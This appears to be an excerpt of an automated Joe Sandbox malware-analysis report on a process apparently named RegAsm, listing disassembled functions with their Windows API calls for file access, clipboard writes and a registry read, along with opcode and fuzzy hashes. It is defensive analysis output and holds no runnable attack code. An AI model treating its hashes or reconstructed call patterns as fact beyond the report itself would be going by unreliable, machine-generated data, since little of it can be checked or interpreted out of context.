                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                        • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                        • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                        • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                        Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: 003685cf356b02fbbab95fb8d76c74631070c0c773c27bafbcebbee0aa56b295
                                                                        • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                        • Opcode Fuzzy Hash: 003685cf356b02fbbab95fb8d76c74631070c0c773c27bafbcebbee0aa56b295
                                                                        • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                        Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                        • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                        • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                        • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                        Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                        • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                        • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                        • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                        Function 0040AA04 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: 196381b9ffc9c4816d42631a332da68c1e878a4277d624e181b366dd14fec77a
                                                                        • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                        • Opcode Fuzzy Hash: 196381b9ffc9c4816d42631a332da68c1e878a4277d624e181b366dd14fec77a
                                                                        • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                        Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                        • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                        • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                        • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                        Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                        • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                        • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                        • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                        Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: EnumNamesResource
                                                                        • String ID:
                                                                        • API String ID: 3334572018-0
                                                                        • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                        • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                        • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                        • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                        Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                        • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                        • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                        • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                        Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: CloseFind
                                                                        • String ID:
                                                                        • API String ID: 1863332320-0
                                                                        • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                        • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                        • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                        • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                        Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID:
                                                                        • API String ID: 71445658-0
                                                                        • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                        • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                        • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                        • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                        Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                        • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                        • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                        • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                        Function 00415304 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??3@
                                                                        • String ID:
                                                                        • API String ID: 613200358-0
                                                                        • Opcode ID: 6cd4ef4cc40bf5a7540e7e9c88dd58f61d837874a50d1d7f714cafdae955675f
                                                                        • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                        • Opcode Fuzzy Hash: 6cd4ef4cc40bf5a7540e7e9c88dd58f61d837874a50d1d7f714cafdae955675f
                                                                        • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                        Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                        • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                        • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                        • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                        Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 004095FC
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                          • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                          • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                                                          • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                        • String ID:
                                                                        • API String ID: 3655998216-0
                                                                        • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                        • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                        • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                        • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                        Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memset.MSVCRT ref: 00445426
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                          • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                          • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                        • String ID:
                                                                        • API String ID: 1828521557-0
                                                                        • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                        • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                        • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                        • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                        Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                          • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                        • memcpy.MSVCRT ref: 00406942
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@FilePointermemcpy
                                                                        • String ID:
                                                                        • API String ID: 609303285-0
                                                                        • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                        • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                        • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                        • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                        Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsicmp
                                                                        • String ID:
                                                                        • API String ID: 2081463915-0
                                                                        • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                        • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                        • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                        • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                        Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                          • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseCreateErrorHandleLastRead
                                                                        • String ID:
                                                                        • API String ID: 2136311172-0
                                                                        • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                        • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                        • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                        • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                        Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ??2@??3@
                                                                        • String ID:
                                                                        • API String ID: 1936579350-0
                                                                        • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                        • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                        • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                        • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8

                                                                        Non-executed Functions

                                                                        Function 004098E2 Relevance: 16.6, APIs: 11, Instructions: 59clipboardmemoryfileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EmptyClipboard.USER32 ref: 004098EC
                                                                          • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                        • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                        • GlobalFix.KERNEL32(00000000), ref: 00409927
                                                                        • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                        • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                        • GetLastError.KERNEL32 ref: 0040995D
                                                                        • CloseHandle.KERNEL32(?), ref: 00409969
                                                                        • GetLastError.KERNEL32 ref: 00409974
                                                                        • CloseClipboard.USER32 ref: 0040997D
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                        • String ID:
                                                                        • API String ID: 2565263379-0
                                                                        • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                        • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                        • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                        • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                        Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EmptyClipboard.USER32 ref: 00409882
                                                                        • wcslen.MSVCRT ref: 0040988F
                                                                        • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                        • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                                        • memcpy.MSVCRT ref: 004098B5
                                                                        • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                        • CloseClipboard.USER32 ref: 004098D7
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                                        • String ID:
                                                                        • API String ID: 2014503067-0
                                                                        • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                        • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                        • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                        • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                        Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLastError.KERNEL32 ref: 004182D7
                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                        • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                        • LocalFree.KERNEL32(?), ref: 00418342
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                                          • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                          • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                                        • String ID: OsError 0x%x (%u)
                                                                        • API String ID: 403622227-2664311388
                                                                        • Opcode ID: 7a793c3aafbc7d353b0e578237d4b483da7e71834841705644cfc2f7eabd6d8e
                                                                        • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                        • Opcode Fuzzy Hash: 7a793c3aafbc7d353b0e578237d4b483da7e71834841705644cfc2f7eabd6d8e
                                                                        • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                        Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.522095920.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                        Similarity
                                                                        • API ID: Version
                                                                        • String ID:
                                                                        • API String ID: 1889659487-0
